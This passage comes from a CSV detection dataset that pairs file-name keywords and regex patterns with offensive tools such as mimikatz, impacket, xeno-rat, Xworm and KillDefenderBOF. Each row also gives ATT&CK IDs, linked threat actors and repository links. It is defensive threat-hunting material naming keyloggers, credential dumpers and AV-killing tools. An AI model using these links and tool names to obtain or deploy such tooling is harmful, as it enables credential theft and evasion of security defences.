tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16117" "*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16118" "*\keylistattack.py*",".{0,1000}\\keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16120" "*\keylog.cpp*",".{0,1000}\\keylog\.cpp.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","16121" "*\keylog.exe*",".{0,1000}\\keylog\.exe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","16122" "*\keylog_tcp.txt*",".{0,1000}\\keylog_tcp\.txt.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","16123" "*\KeyLogger.ahk*",".{0,1000}\\KeyLogger\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","16124" "*\keyLogger.cs*",".{0,1000}\\keyLogger\.cs.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","16125" "*\Keylogger.dll*",".{0,1000}\\Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16126" "*\keylogger.exe*",".{0,1000}\\keylogger\.exe.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - 
TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","0","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","16127" "*\Keylogger.ps1*",".{0,1000}\\Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","16128" "*\Keylogger.txt*",".{0,1000}\\Keylogger\.txt.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","16129" "*\keylogger.txt*",".{0,1000}\\keylogger\.txt.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","16130" "*\keylogger\src\main.rs*",".{0,1000}\\keylogger\\src\\main\.rs.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","16131" 
"*\KeyLoggerOffline.*",".{0,1000}\\KeyLoggerOffline\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","16132" "*\KidLogger\*",".{0,1000}\\KidLogger\\.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16133" "*\KidLogger_is1*",".{0,1000}\\KidLogger_is1.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#registry","registry","10","10","N/A","N/A","N/A","N/A","16134" "*\Kill rats.Exe*",".{0,1000}\\Kill\srats\.Exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16135" "*\Kill_protector.py*",".{0,1000}\\Kill_protector\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","16136" "*\KillAV.exe*",".{0,1000}\\KillAV\.exe.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16137" "*\Killchain.ps1*",".{0,1000}\\Killchain\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","16138" "*\KillDefender.c*",".{0,1000}\\KillDefender\.c.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","16139" "*\KillDefender.o*",".{0,1000}\\KillDefender\.o.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","16140" "*\killer.cpp*",".{0,1000}\\killer\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - 
T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","16141" "*\killer.exe*",".{0,1000}\\killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","16142" "*\KillEvenlogService.ps1*",".{0,1000}\\KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16143" "*\KillEvenlogService.ps1*",".{0,1000}\\KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","16144" "*\killmsas.exe*",".{0,1000}\\killmsas\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential 
Access","https://github.com/ihamburglar/fgdump","1","0","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","16145" "*\KillWindows.dll*",".{0,1000}\\KillWindows\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16147" "*\KillWindows.pdb*",".{0,1000}\\KillWindows\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16148" "*\kintercept.py*",".{0,1000}\\kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16149" "*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","16150" "*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","16151" "*\kitten.exe*",".{0,1000}\\kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","16152" "*\KittyStager*",".{0,1000}\\KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","16153" "*\kiwidns.log*",".{0,1000}\\kiwidns\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16154" "*\kiwifilter.log*",".{0,1000}\\kiwifilter\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - 
Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16155" "*\kiwinp.log*",".{0,1000}\\kiwinp\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16156" 
"*\kiwissp.log*",".{0,1000}\\kiwissp\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16157" "*\kiwisub.log*",".{0,1000}\\kiwisub\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - 
Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16158" "*\klg.ps1*",".{0,1000}\\klg\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16159" "*\knowsmore.py*",".{0,1000}\\knowsmore\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","16160" "*\Koh.exe*",".{0,1000}\\Koh\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 
- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","16161" "*\Koh.pdb*",".{0,1000}\\Koh\.pdb.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","16162" 